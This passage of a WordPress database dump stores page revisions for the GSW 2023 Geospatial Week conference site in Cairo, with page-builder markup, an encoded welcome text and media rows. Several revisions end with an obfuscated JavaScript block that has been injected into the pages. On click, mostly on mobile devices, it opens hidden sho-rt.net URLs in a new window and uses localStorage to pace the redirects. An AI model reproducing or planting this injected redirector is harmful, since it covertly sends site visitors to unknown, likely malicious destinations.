_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-autosave-v1','','','2022-11-09 21:41:34','2022-11-09 21:41:34','',2167,'https://gsw2023.com/?p=3249',0,'revision','',0),
(3250,1,'2022-11-09 21:42:00','2022-11-09 21:42:00','[vc_row equal_height=\"no\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Welcome','','inherit','closed','closed','','2167-revision-v1','','','2022-11-09 21:42:00','2022-11-09 21:42:00','',2167,'https://gsw2023.com/?p=3250',0,'revision','',0),
(3251,1,'2022-11-09 21:53:31','2022-11-09 21:53:31','','intro','','inherit','open','closed','','intro','','','2022-11-09 21:53:31','2022-11-09 21:53:31','',0,'https://gsw2023.com/wp-content/uploads/2022/11/intro.avi',0,'attachment','video/avi',0),
(3252,1,'2022-11-09 21:54:21','2022-11-09 21:54:21','','dr-ismael','','inherit','open','closed','','dr-ismael-3','','','2022-11-09 22:01:32','2022-11-09 22:01:32','',3233,'https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4',0,'attachment','video/mp4',0),
(3253,1,'2022-11-09 21:55:14','2022-11-09 21:55:14','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMH